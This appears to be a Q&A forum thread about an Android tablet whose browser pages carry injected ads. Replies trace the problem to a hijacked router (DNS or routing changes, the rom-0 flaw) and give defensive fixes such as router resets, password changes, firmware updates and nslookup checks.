6

A friend of mine just handed me his tablet saying that everytime he open a webpage the browser redirects to several advertisement page (or, it "adds" advertisements on the page).

This happens both on Chrome and the stock browser.

I used USB debugging to look at the browser request and I think I found the culprit. When the browser loads http://www.google-analytics.com/ga.js the actual code is different. See this screenshot (the green line is where ga.js should terminate):

enter image description here

(and the added code goes on...)

I initially thought that some malware changed the hosts file and assigned a different IP to the google-analytics website, but this is not the case since when I visit the above link directly I see the correct JS code.

How can I track which app is doing this?

William
  • 221
  • 1
  • 7
  • Is there any app managing network traffic like a VPN or proxy? Also try to access the webpages via https (if possible) – GiantTree Feb 22 '15 at 19:55
  • Via HTTPS the problem seems to vanish but I'll make sure and reply – William Feb 22 '15 at 19:57
  • I confirm that via HTTPS the problem vanishes (I tried with reddit.com that allows both HTTP and HTTPS, and via HTTP the page gets redirected). Also, the tablet seems to be pretty clean because the owner tried to clean it before taking it to me: the only apps explicitly installed by him are "Moon+ Reader" and "Mobile Security & Antivirus" (by ESET) – William Feb 22 '15 at 20:20
  • Then there must be something misconfigured. Maybe a proxy that is able to intercept HTTP traffic. – GiantTree Feb 22 '15 at 20:26
  • Following this I can see that no proxy seem to be configured: http://stackoverflow.com/a/21069032/747654, also: the proxy setting seems to be network specific, and the owner had these problems also when connected to his own WiFi... – William Feb 22 '15 at 20:34
  • OK maybe I solved it. I noticed that when the browser asked for ga.js the server response visible from DevTools was actually 304 Not Modified so I thought that maybe when I visited the page directly I would get the right file (but not when asking for ga.js from another page). So I cleared the cache. Now the problem seems to be definitively gone... – William Feb 22 '15 at 20:54
  • Now I wonder: maybe it was a network-related issue (the owner's network fetches the "wrong" ga.js, that will already be cached when connected to my network). But he had tested with his Android cellphone and the issue was not showing. I'll ask him to look again. – William Feb 22 '15 at 21:54
  • Maybe some app before the cleanup. The cache isn't emptied when you uninstall an app. – GiantTree Feb 23 '15 at 00:55
  • I believe this is caused by DNSChanger malware. You might need to reset your router and clear Google Chrome's data and cache to fix it. Take a look at this thread on Google forums: https://productforums.google.com/forum/m/#!topic/chrome/qn1wgcqaFWI – Vinayak Feb 24 '15 at 05:01
  • To test whether you are infected, try running nslookup google-analytics.com from the infected computer (or Android device) and compare the results for the same command run from another computer that you know is clean. Check if both IP addresses are the same. – Vinayak Feb 24 '15 at 05:25
  • Thanks @Vinayak, I'll pass this information to the owner (by the way: your comments might be fit to be moved to an actual answer) – William Feb 24 '15 at 13:32

3 Answers3

4

I've encountered the above situation yesterday. After lots of digging, got to this thread, and it led me to the solution.

Apparently, that one of the computers on the network I've visit, was exposed to a malware that modified the router settings. The router was a D-Link 2760U/E with default Admin / Admin login details.

Using the above credentials, the above malware has changed the "static routing tables" adding their servers to be a man in the middle. All non SSL traffic had passed through their service which injected js into the page. I've found a GitHub page who shows the modifications and additions.

It took me a while to understand that all the traffic is coming from a DNS change attack - I have checked and verified that the computer is totally clean and no unknown process / services are running before and while the test.

One of the things they have done is to redirect all google-analytics.com traffic to their server, keeping them under the radar.

So how to resolve it:

Quick way:

Reset you router to factory settings - note it will erase all existing settings.

Long way:

  1. Login into the routers web UI
  2. Remove all unknown entries from the static routing tables
  3. Change your login password for the router
  4. Reboot your router.

I hope this post will assist someone.

Regards,
Liron

Liron
  • 161
  • 6
2

This might be caused by DNSChanger malware but that's dead now so it's possible that it's caused by some other kind of malware that messes with a computer's (or router's) DNS settings. Or maybe the router was exposed to the web (see remote management) and someone was able to hijack it and change its DNS settings.

If the same problem affects all devices (PCs included) connected to the Wi-Fi network, then I guess a router reset is in order in addition to doing a malware scan on all PCs connected to the network. You may use Malwarebytes Anti-Malware for that.

On the Android device, clear Google Chrome's data and cache after the router has been reset and the malware scan is complete. This thread on Google Product Forums might be relevant to the issue.

To test whether or not this is indeed a DNS hijack problem, try running nslookup google-analytics.com from the infected computer (or Android device if BusyBox is installed) and compare the results for the same command run from another computer that you know is clean.

Check if they both return the same IP addresses or in the case of Google, IP addresses controlled by Google. You can verify whether a given IP is Google's or not by doing a WHOIS lookup here: http://whois.domaintools.com/X.X.X.X (x.x.x.x being the IP address)

Vinayak
  • 235
  • 5
  • 15
1

In the end I found out that the router was vulnerable to the rom-0 vulnerability (to test if your router is vulnerable, use this).

So, the issue was most likely caused by someone (or something) who had complete access to the admin interface of the router. I've now updated the firmware (and the test is now negative).

William
  • 221
  • 1
  • 7
  • Where did you find the vulnerability check? How did you check its authenticity? How do you know that there isn't anything going on behind the scenes? There isn't any type of info on the website, except "press the button". A little fishy. – HasH_BrowN Jul 19 '15 at 17:06
  • That checker is mentioned in the paper I cited in the answer (in the paper they explain how to check the vulnerability, and it's reasonable that you can do it with a single button press, since all you need is an IP address) – William Jul 19 '15 at 18:26